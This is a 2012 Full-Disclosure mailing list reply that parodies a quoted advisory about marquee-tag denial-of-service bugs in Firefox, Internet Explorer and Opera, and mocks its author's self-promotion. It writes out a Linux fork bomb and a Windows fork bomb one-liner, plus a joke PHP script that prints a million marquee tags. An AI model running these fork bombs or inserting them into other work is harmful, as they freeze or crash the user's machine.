Re: DoS vulnerabilities in Firefox, Internet Explorer and Opera

[InterN0T Advisories <advisories () intern0t net>]

Hello list!

I also want to warn you about Denial of Service vulnerability, in almost
every Operating System there is, by e.g., opening a lot of programs at the
same time, or by using Fork bombs such as this in the Linux console: :(){
:|:& };: (Reference: http://en.wikipedia.org/wiki/Fork_bomb ), in Windows
this bug can be: %0|%0 and in browsers, creating a HTML file that writes a
million marquee tags will also make the browser freeze in most cases with
current computing technology.

Proof of Concept:
<?php
// Secret Leaked MustLive DoS script

$i = 0;
$count = 1000000;
$omg = "<marquee>Hello list! I want to warn you about
vulnerability!</marquee>";

while ($i <= $count):
echo $omg; // <-- Send this to FD soon and say it's a bug I discovered a
couple of years ago to make it look even more cool along with 5 links to my
website so it can receive more backlinks and a higher page rank hopefully.
$i++;
endwhile;

?>

While this bug can't be fixed, it will always be a problem (in the future
it will just be larger scales), but as I just stated, it can't be fixed. It
is the same as trying to run Crysis on a Commodore64, it may be possible,
but your machine will respond as if it is experiencing a Denial of Service
attack, if it doesn't report an error such as "Insufficient memory" or "Out
of memory" and crashes instead.



To make up for the MustLive linkspam and this reply, here's a few
unrelated links that may interest you:
http://www.wired.com/threatlevel/2012/04/ruggedcom-backdoor/
http://blog.spiderlabs.com/2012/04/pwning-a-spammers-keylogger.html
http://group-ib.com/images/media/Group-IB_Report_2011_ENG.pdf (State and
Trends of the Russian Digital Crime Market)
http://dualcoremusic.com/nerdcore/upload/dual_core-control.mp3 (Dual Core
- Control, it's a song for The Social Engineer Podcast and Chris Hadnagy of
course.)
http://abcnews.go.com/Technology/wireStory/report-iran-unplugs-oil-facilities-internet-16194653#.T58cOcXSoV0

Note that I have absolutely no relation to any of the websites above.



Best regards,
Nemesis 3.0

On Mon, 30 Apr 2012 15:37:08 +0300, "MustLive"
<mustlive () websecurity com ua> wrote:
> Hello list!
>
> I want to warn you about Denial of Service vulnerability in Mozilla
> Firefox, Internet Explorer and Opera. Earlier there was published DoS
> vulnerability in browser Opera 10.10 found by Inj3ct0r
> (http://securityvulns.com/news/Opera/1002.html). And some time ago I've
> checked this exploit and found that many other browsers are vulnerable
to
> this attack.
>
> These are Denial of Service vulnerabilities in Mozilla Firefox,
Microsoft
> Internet Explorer and Opera. They belong to type
> (http://websecurity.com.ua/2550/) crashing DoS, blocking DoS and
resources
> consumption DoS.
>
> The exploit from Inj3ct0r is similar to the exploits, which I've made
for
> Google Chrome (for my project "Day of bugs in Google Chrome") and
Mozilla
> Firefox in 2008. Attack in my exploits was conducting via large amount
of
> nested marquee tags, and in his case the html, marquee and h1 tags were
> used. But the essence is the same - large amount of nested tags
> (particularly marquee). That time I've informed Google and Mozilla and
> placed Bug 454434 (https://bugzilla.mozilla.org/show_bug.cgi?id=454434)
in
> Bugzilla, but if Google had fixed the hole, Mozilla hadn't fixed this
> vulnerability.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, 4.0 beta 2, 11.0,
> Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13),
> Internet Explorer 8 (8.00.6001.18702) and Opera 10.62, and previous
> versions of these browsers also must be vulnerable. Other browsers can
be
> vulnerable as well.
>
> ----------
> Details:
> ----------
>
> DoS (WASC-10):
>
> This is my version of the exploit for different browsers.
http://websecurity.com.ua/uploads/2012/Firefox,%20IE%20&%20Opera%20DoS%20Exploit.html
> This exploit uses JS, but attack can be conducted and without JS - as it
> shown in my 2008's exploit
(http://websecurity.com.ua/uploads/2008/Firefox%203%20DoS%20Exploit.html).
> This exploit works in the following way:
>
> * Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM)
and
> crashes.
> * Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM)
and
> crashes.
> * Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM)
and
> crashes.
> * Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and
a
> lot of RAM).
> * Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot
> of RAM).
> * Internet Explorer 6 freezes and consumes resources (50% CPU and a lot
of
> RAM).
> * Internet Explorer 7 freezes and consumes resources (50% CPU and a lot
of
> RAM).
> * Internet Explorer 8 only consumes resources (50% CPU and a lot of
RAM).
> I.e. in IE8 the problem was partly fixed by Microsoft.
> * Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).
> * The exploit doesn't work in browser Google Chrome already since
version
> 1.0.154.48. Google fixed vulnerability with marquee tag after my
informing
> in 2008.
>
> ------------
> Timeline:
> ------------ 
>
> 2012.04.23 - disclosed at my site (http://websecurity.com.ua/5808/).
> 2012.04.24 - reminded Mozilla that they still hadn't fixed 2008's hole.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/